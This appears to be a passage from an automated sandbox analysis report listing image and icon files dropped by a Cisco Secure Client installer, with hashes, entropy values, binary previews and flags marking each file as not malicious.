                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-LNVO4.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-LVK1S.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-M6RPQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-M9GOH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-MSL17.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-NFRKI.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-NPGN3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-NUMH7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-ORT9V.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-OVLBH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-P0JKD.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-P5RVO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-PPBBJ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
